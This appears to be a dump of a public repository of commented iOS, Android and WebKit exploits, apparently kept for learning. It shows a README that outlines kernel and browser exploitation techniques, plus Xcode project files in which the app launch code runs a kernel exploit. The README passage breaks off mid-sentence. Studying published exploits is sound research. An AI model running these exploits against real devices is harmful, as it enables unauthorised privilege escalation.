├── 1day └── webkit-CVE-2017-2547_standalone_version.html ├── CVE-2016-2434 └── exploit_CVE-2016-2434_commented.c ├── CVE-2016-5342 ├── exploit_mp3_bypass_pxn_commented.c └── exploit_tty_bypass_pxn_commented.c ├── CVE-2016-8655 └── CVE-2016-8655_chocobo_root_commented.c ├── CVE-2018-4233 ├── LICENSE └── pwn_i8.js ├── README.md ├── empty_list ├── __MACOSX │ └── empty_list │ │ ├── ._empty_list.xcodeproj │ │ ├── empty_list.xcodeproj │ │ └── ._project.xcworkspace │ │ └── empty_list │ │ ├── ._AppDelegate.h │ │ ├── ._AppDelegate.m │ │ ├── ._Info.plist │ │ ├── ._README │ │ ├── ._ViewController.h │ │ ├── ._ViewController.m │ │ ├── ._kmem.c │ │ ├── ._kmem.h │ │ ├── ._main.m │ │ ├── ._offsets.h │ │ ├── ._offsets.m │ │ ├── ._sploit.c │ │ ├── ._sploit.h │ │ ├── Assets.xcassets │ │ └── ._Contents.json │ │ └── Base.lproj │ │ ├── ._LaunchScreen.storyboard │ │ └── ._Main.storyboard └── empty_list │ ├── empty_list.xcodeproj │ ├── project.pbxproj │ ├── project.xcworkspace │ │ ├── contents.xcworkspacedata │ │ ├── xcshareddata │ │ │ └── IDEWorkspaceChecks.plist │ │ └── xcuserdata │ │ │ └── ianbeer.xcuserdatad │ │ │ └── UserInterfaceState.xcuserstate │ └── xcuserdata │ │ └── ianbeer.xcuserdatad │ │ ├── xcdebugger │ │ └── Breakpoints_v2.xcbkptlist │ │ └── xcschemes │ │ └── xcschememanagement.plist │ └── empty_list │ ├── AppDelegate.h │ ├── AppDelegate.m │ ├── Assets.xcassets │ ├── AppIcon.appiconset │ │ └── Contents.json │ └── Contents.json │ ├── Base.lproj │ ├── LaunchScreen.storyboard │ └── Main.storyboard │ ├── Info.plist │ ├── README │ ├── ViewController.h │ ├── ViewController.m │ ├── kmem.c │ ├── kmem.h │ ├── main.m │ ├── offsets.h │ ├── offsets.m │ ├── sploit.c │ └── sploit.h ├── extra_recipe ├── extra_recipe-cydia │ ├── README.md │ ├── extra_recipe.xcodeproj │ │ ├── project.pbxproj │ │ ├── project.xcworkspace │ │ │ ├── contents.xcworkspacedata │ │ │ └── xcuserdata │ │ │ │ └── ianbeer.xcuserdatad │ │ │ │ └── UserInterfaceState.xcuserstate │ │ └── xcuserdata │ │ │ └── 
ianbeer.xcuserdatad │ │ │ └── xcschemes │ │ │ ├── extra_recipe.xcscheme │ │ │ └── xcschememanagement.plist │ └── extra_recipe │ │ ├── 0.reload.plist │ │ ├── AppDelegate.swift │ │ ├── Assets.xcassets │ │ └── AppIcon.appiconset │ │ │ └── Contents.json │ │ ├── Base.lproj │ │ ├── LaunchScreen.storyboard │ │ └── Main.storyboard │ │ ├── Info.plist │ │ ├── README │ │ ├── ViewController.swift │ │ ├── bootstrap.tar │ │ ├── def.plist │ │ ├── dex.plist │ │ ├── dropbear.plist │ │ ├── extra_recipe-Bridging-Header.h │ │ ├── jailbreak.c │ │ ├── launchctl │ │ ├── load_regs_and_crash.s │ │ ├── mach-portal.dylib │ │ ├── mach_portal.dylib │ │ ├── offsets.h │ │ ├── offsets.m │ │ ├── patchfinder64.c │ │ ├── patchfinder64.h │ │ ├── pte_stuff.h │ │ ├── reload │ │ ├── tar │ │ ├── unjail.h │ │ └── unjail.m ├── extra_recipe-master │ ├── README.md │ ├── extra_recipe.xcodeproj │ │ ├── project.pbxproj │ │ ├── project.xcworkspace │ │ │ ├── contents.xcworkspacedata │ │ │ └── xcuserdata │ │ │ │ └── ianbeer.xcuserdatad │ │ │ │ └── UserInterfaceState.xcuserstate │ │ └── xcuserdata │ │ │ └── ianbeer.xcuserdatad │ │ │ └── xcschemes │ │ │ ├── extra_recipe.xcscheme │ │ │ └── xcschememanagement.plist │ └── extra_recipe │ │ ├── AppDelegate.swift │ │ ├── Assets.xcassets │ │ └── AppIcon.appiconset │ │ │ └── Contents.json │ │ ├── Base.lproj │ │ ├── LaunchScreen.storyboard │ │ └── Main.storyboard │ │ ├── Info.plist │ │ ├── README │ │ ├── ViewController.swift │ │ ├── bootstrap.tar │ │ ├── def.plist │ │ ├── dex.plist │ │ ├── extra_recipe-Bridging-Header.h │ │ ├── jailbreak.c │ │ ├── launchctl │ │ ├── load_regs_and_crash.s │ │ ├── mach-portal.dylib │ │ ├── mach_portal.dylib │ │ ├── offsets.h │ │ ├── offsets.m │ │ ├── patchfinder64.c │ │ ├── patchfinder64.h │ │ ├── pte_stuff.h │ │ ├── tar │ │ ├── unjail.h │ │ └── unjail.m └── yalu102-master │ ├── .github │ └── ISSUE_TEMPLATE.md │ ├── .gitignore │ ├── LICENSE │ ├── README.md │ ├── yalu102.xcodeproj │ ├── project.pbxproj │ └── project.xcworkspace │ │ └── 
contents.xcworkspacedata │ └── yalu102 │ ├── 0.reload.plist │ ├── AppDelegate.h │ ├── AppDelegate.m │ ├── Assets.xcassets │ └── AppIcon.appiconset │ │ ├── AppIcon40x40@2x~ipad-1.png │ │ ├── AppIcon40x40@2x~ipad.png │ │ ├── AppIcon40x40@2x~ipadnotif.png │ │ ├── AppIcon40x40@2x~ipadsptl-1.png │ │ ├── AppIcon40x40@2x~ipadsptl.png │ │ ├── AppIcon40x40@2x~ipadsptl3.png │ │ ├── AppIcon40x40@2x~ipadsptlsmal.png │ │ ├── AppIcon40x40@3x~iphone.png │ │ ├── AppIcon40x40~ipad-1.png │ │ ├── AppIcon40x40~ipad-2.png │ │ ├── AppIcon40x40~ipad.png │ │ ├── AppIcon60x60.png │ │ ├── AppIcon60x60@2x.png │ │ ├── AppIcon60x60@2x~ipad.png │ │ ├── AppIcon60x60@2x~ipadpro.png │ │ ├── AppIcon60x60@3x.png │ │ ├── AppIcon60x60~ipad.png │ │ └── Contents.json │ ├── Base.lproj │ ├── LaunchScreen.storyboard │ └── Main.storyboard │ ├── IOKit.tbd │ ├── Info.plist │ ├── ViewController.h │ ├── ViewController.m │ ├── bootstrap.tar │ ├── devicesupport.h │ ├── devicesupport.m │ ├── dropbear.plist │ ├── iokitmig64.o │ ├── jailbreak.m │ ├── launchctl │ ├── main.m │ ├── offsets.c │ ├── offsets.h │ ├── patchfinder64.h │ ├── patchfinder64.o │ ├── pte_stuff.h │ ├── reload │ └── tar ├── jsc_ConcatMemcpy_infoleak └── ileak.html └── jsc_prop_enum_uaf ├── LICENSE ├── ibin.js └── index.html /1day/webkit-CVE-2017-2547_standalone_version.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 362 | 363 | -------------------------------------------------------------------------------- /CVE-2018-4233/LICENSE: -------------------------------------------------------------------------------- 1 | Copyright (c) 2018, Niklas Baumstark 2 | All rights reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without 5 | modification, are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 2. 
Redistributions in binary form must reproduce the above copyright notice, 10 | this list of conditions and the following disclaimer in the documentation 11 | and/or other materials provided with the distribution. 12 | 13 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 14 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 15 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 16 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR 17 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 18 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 19 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND 20 | ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 21 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 22 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 23 | 24 | The views and conclusions contained in the software and documentation are those 25 | of the authors and should not be interpreted as representing official policies, 26 | either expressed or implied, of the FreeBSD Project. -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # About 2 | 3 | This is where I will post analysis of Public Exploits, or some of my 1day exploits. 4 | 5 | 6 | 7 | ## [ Public exploit analysis ] 8 | 9 | - Personally I think the best way to learn a public exploit is by understanding it line-by-line until I can understand the exploit to the fullest. I will post some of these (overly-commented ;) ) exploits so hopefully others can learn from it, and as an attempt to give something back to the community. Also for documenting purposes, cause these things kind of fade away from my head as time passes. 
10 | 11 | ### CVE-2016-8655 12 | 13 | - This is a detailed analysis of [rebel's exploit](http://seclists.org/oss-sec/2016/q4/621). 14 | - Thanks **rebel** for the awesome exploit! :D 15 | 16 | ### CVE-2016-5342 17 | #### mp3 version 18 | - This is a commented version of [freener's android LPE exploit](https://github.com/freener/exploits/blob/master/CVE-2016-5342/exploit_mp3_bypass_pxn.c) 19 | - arm32 20 | - Heap overflow 21 | - This exploit directly overwrites a function pointer of another object 22 | 23 | #### tty version 24 | - This is a commented version of [freener's android LPE exploit](https://github.com/freener/exploits/blob/master/CVE-2016-5342/exploit_tty_bypass_pxn.c) 25 | - arm32 26 | - Heap overflow 27 | - This exploit overwrites an object pointer in another object. It uses a ret2dir attack: the payload is staged in user memory and reached through the kernel's own direct (linear) mapping of that physical memory, so the corrupted pointer can point to a predictable, fixed kernel address that holds the exploit payload. Because the kernel never dereferences or executes a user-space address directly, this technique bypasses both PXN and PAN. 28 | 29 | ### CVE-2016-2434 30 | - This is a commented version of [Jianqiang Zhao's android LPE exploit](https://github.com/jianqiangzhao/CVE-2016-2434) 31 | - arm64 32 | - Zero-out 16 bytes at an arbitrary address 33 | - This exploit wipes out 16 bytes of a useful global object, which is located at a fixed address in the kernel. 34 | - A corrupted object pointer within the global object references the exploit payload in userland, so the kernel ends up dereferencing a user-space address. This kind of attack will not work on devices/kernels with PAN (or PAN emulation), which fault on exactly that kind of access. 35 | 36 | ### extra_recipe 37 | - My attempt to understand the extra_recipe jailbreak 38 | - I was especially interested in the kpp bypass part. Although there were a couple of slides on the subject from which I could glean a vague picture of the bypass, I really wanted to dig into the fine details and see what is actually going on inside the code 39 | - I also wanted to understand the final ingredients for a jailbreak (installing Cydia, etc.)
40 | 41 | #### yalu102 (ViewController.m) 42 | - I commented the part relevant to the actual bug, and how it was exploited. 43 | - The reason I looked into yalu102 instead of the original exploit is that its port feng-shui technique looked cleaner and more straightforward to understand. 44 | - The analysis stops right before the kpp bypass 45 | 46 | #### xerub's extra_recipe-master (jailbreak.c, unjail.m, patchfinder64.c, pte_stuff.h) 47 | - I jumped here because it had a little more information on the various numeric offsets. 48 | - Also, the patchfinder64.c source is intact, as opposed to yalu102, which ships only an object file (patchfinder64.o). 49 | - The Cydia part is kind of incomplete, so I jump to the cydia branch after kpp 50 | 51 | #### xerub's extra_recipe-cydia (unjail.m) 52 | - Trying to understand the ingredients for a jailbreak after tfp0, and post-exploitation 53 | 54 | ### empty_list (sploit.c) 55 | - A detailed breakdown of Ian Beer's [empty_list kernel exploit](https://bugs.chromium.org/p/project-zero/issues/detail?id=1564). 56 | - It uses amazing techniques to start from really weak primitives, build a stronger AAR, and finally build a full-fledged task port. The port magic behind the exploit code is unbelievable. All of this from an 8-NULL-byte heap overflow (CVE-2018-4243: 8 zero bytes written off the end of a kalloc.16 allocation; see the README in the empty_list directory). Absolutely mindblowing. 57 | - I've scribbled some naive ideas to improve the reliability. Hopefully someone will release a more reliable version of the exploit in the future. :) 58 | - Thanks **Ian Beer** for the amazing exploit! 59 | 60 | ### CVE-2018-4233 61 | - This is a commented version of @niklas_b's [iOS Webkit exploit](https://github.com/phoenhex/files/tree/master/exploits/ios-11.3.1). 62 | - A huge thanks to [kudima](https://github.com/kudima)([@begger_dd](https://twitter.com/begger_dd)) for the very clear and concise, thoroughly annotated writeup!
:) 63 | - The writeup explains the JIT type confusion bug, some limitations on boxing/unboxing conversions (which could introduce unreliability), and a detailed walkthrough of how the early/late AAR/AAW primitives are constructed. He also provides insight into the changes in exploitation techniques after the recent round of mitigations (index masking, ArrayBuffer backing-store poisoning, some changes to the W^X JIT mechanism, changes in the JSObject layout, etc.) 64 | 65 | ### jsc_ConcatMemcpy_infoleak 66 | - This is a commented version of kudima's WebKit infoleak exploit (fixed on 2018-08-27). 67 | - It stems from an incomplete fix for one of the bugs reported by lokihardt. The patch from lokihardt's report fixed the Double -> Object type confusion primitive, but didn't fix it the other way around: Object -> Double. 68 | - It sprays the WebKit heap with butterflies containing a single object and a marker, and later on triggers the concat bug, which fills a large portion of several double arrays with uninitialized heap data. It iterates through the uninitialized double arrays produced by the buggy concat until it finds the previously sprayed object's address, and leaks it. 69 | - Thanks again [kudima](https://github.com/kudima)([@begger_dd](https://twitter.com/begger_dd)) for the nice exploit and writeup! :) 70 | 71 | ### jsc_prop_enum_uaf 72 | - This is another contribution from [kudima](https://github.com/kudima). It is a commented version of kudima's WebKit remote code execution exploit (fixed in [this commit](https://github.com/WebKit/webkit/commit/011860e5cb6a702a987545580eb698efa34ace4e)). It is fixed in iOS 12.1, and works up to iOS 12.0.1.
73 | - The issue is that while executing code in baseline-JIT-compiled for-in loops, you can introduce code that frees the StructureID object backing the JSObject and triggers the garbage collector, but the garbage collector doesn't mark the "JSPropertyNameEnumerator->m_cachedStructureID" member, so the StructureID object that "JSPropertyNameEnumerator->m_cachedStructureID" points to gets freed during the sweep phase, resulting in a dangling pointer. 74 | - After the StructureID object is freed by the GC, you can introduce code that creates a new StructureID object, which takes the previously freed "StructureID object" slot. 75 | - By freeing the StructureID of object A, and then making object B create a new StructureID which takes its place, it is possible to create a type-confusion situation because "JSPropertyNameEnumerator->m_cachedInlineCapacity" is still set to object A's inline property size, while "JSPropertyNameEnumerator->m_cachedStructureID" points to the new StructureID object which represents object B. This makes a check in 'op_get_direct_pname' pass and lets object B access inline properties out of its bounds. 76 | - This can be abused to build stronger primitives such as AAR/AAW, which are then used to execute arbitrary code. 77 | - Thanks [kudima](https://github.com/kudima)([@begger_dd](https://twitter.com/begger_dd)) for the cool exploit and very detailed writeup! :) 78 | 79 | ## [ 1Day ] 80 | 81 | ### CVE-2017-2547 82 | - One day I looked at [singi's exploit](https://github.com/theori-io/zer0con2018_singi/tree/master/code/safari) after it was presented at Zer0con 2018, and decided to improve it. 83 | - This is a standalone version of the exploit, before I integrated it into **pwnjs**.
84 | - The improvements include 85 | - Increased reliability (works flawlessly after extensive browsing sessions with contaminated memory) 86 | - Removed all hardcoded offsets to make it compatible with various browser versions 87 | - Used a different exploitation technique (the standard misalign technique) 88 | - Eventually integrated it into the pwnjs framework by creating a webkit prototype 89 | - Made the code a lot more readable, and added lots of comments 90 | - Special Thanks 91 | - **qwertyoruiop & Samuel Groß** for the amazing phrack article and public exploits 92 | - **Brian Pak & Andrew Wesie** for the awesome pwnjs framework! 93 | -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/._empty_list.xcodeproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/._empty_list.xcodeproj -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/empty_list.xcodeproj/._project.xcworkspace: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/empty_list.xcodeproj/._project.xcworkspace -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/empty_list/._AppDelegate.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/empty_list/._AppDelegate.h -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/empty_list/._AppDelegate.m:
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/empty_list/._AppDelegate.m -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/empty_list/._Info.plist: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/empty_list/._Info.plist -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/empty_list/._README: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/empty_list/._README -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/empty_list/._ViewController.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/empty_list/._ViewController.h -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/empty_list/._ViewController.m: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/empty_list/._ViewController.m -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/empty_list/._kmem.c: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/empty_list/._kmem.c -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/empty_list/._kmem.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/empty_list/._kmem.h -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/empty_list/._main.m: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/empty_list/._main.m -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/empty_list/._offsets.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/empty_list/._offsets.h -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/empty_list/._offsets.m: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/empty_list/._offsets.m -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/empty_list/._sploit.c: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/empty_list/._sploit.c -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/empty_list/._sploit.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/empty_list/._sploit.h -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/empty_list/Assets.xcassets/._Contents.json: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/empty_list/Assets.xcassets/._Contents.json -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/empty_list/Base.lproj/._LaunchScreen.storyboard: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/empty_list/Base.lproj/._LaunchScreen.storyboard -------------------------------------------------------------------------------- /empty_list/__MACOSX/empty_list/empty_list/Base.lproj/._Main.storyboard: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/__MACOSX/empty_list/empty_list/Base.lproj/._Main.storyboard -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list.xcodeproj/project.xcworkspace/contents.xcworkspacedata: 
-------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | IDEDidComputeMac32BitWarning 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list.xcodeproj/project.xcworkspace/xcuserdata/ianbeer.xcuserdatad/UserInterfaceState.xcuserstate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/empty_list/empty_list/empty_list.xcodeproj/project.xcworkspace/xcuserdata/ianbeer.xcuserdatad/UserInterfaceState.xcuserstate -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list.xcodeproj/xcuserdata/ianbeer.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list.xcodeproj/xcuserdata/ianbeer.xcuserdatad/xcschemes/xcschememanagement.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | SchemeUserState 6 | 7 | empty_list.xcscheme 8 | 9 | orderHint 10 | 0 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list/AppDelegate.h: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | /* Application delegate for the empty_list exploit app. The kernel exploit is not started from this header; AppDelegate.m (same directory) includes sploit.h and dispatches it from application:didFinishLaunchingWithOptions:. NOTE(review): the #import argument (presumably the UIKit umbrella header, since UIResponder/UIWindow are used below) and the delegate protocol conformance after UIResponder were stripped by HTML extraction of this listing - confirm against the repository file. */ @interface AppDelegate : UIResponder 4 | 5 | /* Main window; standard Xcode template property, retained by the delegate. */ @property (strong, nonatomic) UIWindow *window; 6 | 7 | 8 | @end 9 | 10 |
-------------------------------------------------------------------------------- /empty_list/empty_list/empty_list/AppDelegate.m: -------------------------------------------------------------------------------- 1 | #import "AppDelegate.h" 2 | #include "sploit.h" 3 | 4 | /* Private class extension; nothing is declared here. */ @interface AppDelegate () 5 | 6 | @end 7 | 8 | @implementation AppDelegate 9 | 10 | 11 | /* App launch hook. vfs_sploit() (declared in sploit.h) is dispatched onto a high-priority global concurrent queue, so this method returns immediately and the UI comes up while the kernel exploit runs in the background. NOTE(review): the exploit fires unconditionally on every launch - nothing in this file gates it on the device/OS build (the README targets iOS 11.0 - 11.3.1) and a failed attempt can panic the device (the README discusses panic conditions during the groom); any version/offset check is presumably inside vfs_sploit() or offsets.m - verify before running on other builds. The block discards vfs_sploit()'s outcome, so success/failure is only observable through whatever it logs itself. */ - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions { 12 | // Override point for customization after application launch. 13 | dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH, 0), 14 | ^{vfs_sploit();}); 15 | return YES; 16 | } 17 | 18 | 19 | /* Xcode template stub; intentionally empty. Note that backgrounding the app does not stop the exploit thread already running on the global queue. */ - (void)applicationWillResignActive:(UIApplication *)application { 20 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state. 21 | // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game. 22 | } 23 | 24 | 25 | /* Xcode template stub; intentionally empty. */ - (void)applicationDidEnterBackground:(UIApplication *)application { 26 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later. 27 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits. 28 | } 29 | 30 | 31 | /* Xcode template stub; intentionally empty. */ - (void)applicationWillEnterForeground:(UIApplication *)application { 32 | // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background.
33 | } 34 | 35 | 36 | /* Xcode template stub; intentionally empty. */ - (void)applicationDidBecomeActive:(UIApplication *)application { 37 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface. 38 | } 39 | 40 | 41 | /* Xcode template stub; intentionally empty. No cleanup of exploit state happens on termination. */ - (void)applicationWillTerminate:(UIApplication *)application { 42 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:. 43 | } 44 | 45 | 46 | @end 47 | -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "iphone", 5 | "size" : "20x20", 6 | "scale" : "2x" 7 | }, 8 | { 9 | "idiom" : "iphone", 10 | "size" : "20x20", 11 | "scale" : "3x" 12 | }, 13 | { 14 | "idiom" : "iphone", 15 | "size" : "29x29", 16 | "scale" : "2x" 17 | }, 18 | { 19 | "idiom" : "iphone", 20 | "size" : "29x29", 21 | "scale" : "3x" 22 | }, 23 | { 24 | "idiom" : "iphone", 25 | "size" : "40x40", 26 | "scale" : "2x" 27 | }, 28 | { 29 | "idiom" : "iphone", 30 | "size" : "40x40", 31 | "scale" : "3x" 32 | }, 33 | { 34 | "idiom" : "iphone", 35 | "size" : "60x60", 36 | "scale" : "2x" 37 | }, 38 | { 39 | "idiom" : "iphone", 40 | "size" : "60x60", 41 | "scale" : "3x" 42 | }, 43 | { 44 | "idiom" : "ipad", 45 | "size" : "20x20", 46 | "scale" : "1x" 47 | }, 48 | { 49 | "idiom" : "ipad", 50 | "size" : "20x20", 51 | "scale" : "2x" 52 | }, 53 | { 54 | "idiom" : "ipad", 55 | "size" : "29x29", 56 | "scale" : "1x" 57 | }, 58 | { 59 | "idiom" : "ipad", 60 | "size" : "29x29", 61 | "scale" : "2x" 62 | }, 63 | { 64 | "idiom" : "ipad", 65 | "size" : "40x40", 66 | "scale" : "1x" 67 | }, 68 | { 69 | "idiom" : "ipad", 70 | "size" : "40x40", 71 | "scale" : "2x" 72 | }, 73 | { 74 | "idiom" : "ipad", 75 | "size" : "76x76", 76 |
"scale" : "1x" 77 | }, 78 | { 79 | "idiom" : "ipad", 80 | "size" : "76x76", 81 | "scale" : "2x" 82 | }, 83 | { 84 | "idiom" : "ipad", 85 | "size" : "83.5x83.5", 86 | "scale" : "2x" 87 | }, 88 | { 89 | "idiom" : "ios-marketing", 90 | "size" : "1024x1024", 91 | "scale" : "1x" 92 | } 93 | ], 94 | "info" : { 95 | "version" : 1, 96 | "author" : "xcode" 97 | } 98 | } -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list/Assets.xcassets/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "version" : 1, 4 | "author" : "xcode" 5 | } 6 | } -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list/Base.lproj/LaunchScreen.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list/Base.lproj/Main.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | $(DEVELOPMENT_LANGUAGE) 7 | CFBundleExecutable 8 | $(EXECUTABLE_NAME) 9 | CFBundleIdentifier 10 | $(PRODUCT_BUNDLE_IDENTIFIER) 11 | CFBundleInfoDictionaryVersion 12 | 6.0 13 | CFBundleName 14 | $(PRODUCT_NAME) 15 | CFBundlePackageType 16 | APPL 17 | CFBundleShortVersionString 18 | 1.0 19 | CFBundleVersion 20 | 1 21 | LSRequiresIPhoneOS 22 | 23 | UILaunchStoryboardName 24 | 
LaunchScreen 25 | UIMainStoryboardFile 26 | Main 27 | UIRequiredDeviceCapabilities 28 | 29 | armv7 30 | 31 | UISupportedInterfaceOrientations 32 | 33 | UIInterfaceOrientationPortrait 34 | UIInterfaceOrientationLandscapeLeft 35 | UIInterfaceOrientationLandscapeRight 36 | 37 | UISupportedInterfaceOrientations~ipad 38 | 39 | UIInterfaceOrientationPortrait 40 | UIInterfaceOrientationPortraitUpsideDown 41 | UIInterfaceOrientationLandscapeLeft 42 | UIInterfaceOrientationLandscapeRight 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list/README: -------------------------------------------------------------------------------- 1 | empty_list - exploit for p0 issue 1564 (CVE-2018-4243) iOS 11.0 - 11.3.1 kernel r/w 2 | @i41nbeer 3 | 4 | BUG: 5 | getvolattrlist takes a user-controlled bufferSize argument via the fgetattrlist syscall. 6 | 7 | When allocating a kernel buffer to serialize the attr list into, there's the following comment: 8 | 9 | /* 10 | * Allocate a target buffer for attribute results. 11 | * Note that since we won't ever copy out more than the caller requested, 12 | * we never need to allocate more than they offer. 13 | */ 14 | ab.allocated = ulmin(bufferSize, fixedsize + varsize); 15 | if (ab.allocated > 